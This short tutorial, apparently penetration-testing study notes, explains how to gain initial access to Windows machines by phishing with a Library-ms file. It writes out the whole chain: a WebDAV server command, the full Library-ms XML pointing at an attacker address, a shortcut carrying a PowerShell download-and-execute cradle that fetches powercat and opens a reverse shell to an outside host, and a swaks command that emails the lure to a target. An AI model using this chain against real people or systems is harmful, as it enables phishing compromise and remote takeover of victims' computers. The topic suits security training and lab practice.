Windows Library Files

Here we will show how we can exploit Library Files to get initial access.

---

Workflow

• Setup a WebDAV service

• Create Library file

• Create shortcut

• Attach Library File and send email

As seen above we start with setting up a WebDAV server.

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root $(pwd)

Then we create a Library-ms file in VSCode with below content.

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.179</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Now we create a shortcut which we will serve on the WebDAV service.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.100:8000/powercat.ps1');powercat -c 192.168.45.100 -p 443 -e powershell"

Finally we send the Library-ms file using swaks.

swaks --to mailadmin@localhost --from test@localhost --header "Subject: Nice" --body @body.txt --attach @config.Library-ms --server <target-ip> --suppress-data

After the user clicks on the shortcut we should get a reverse shell.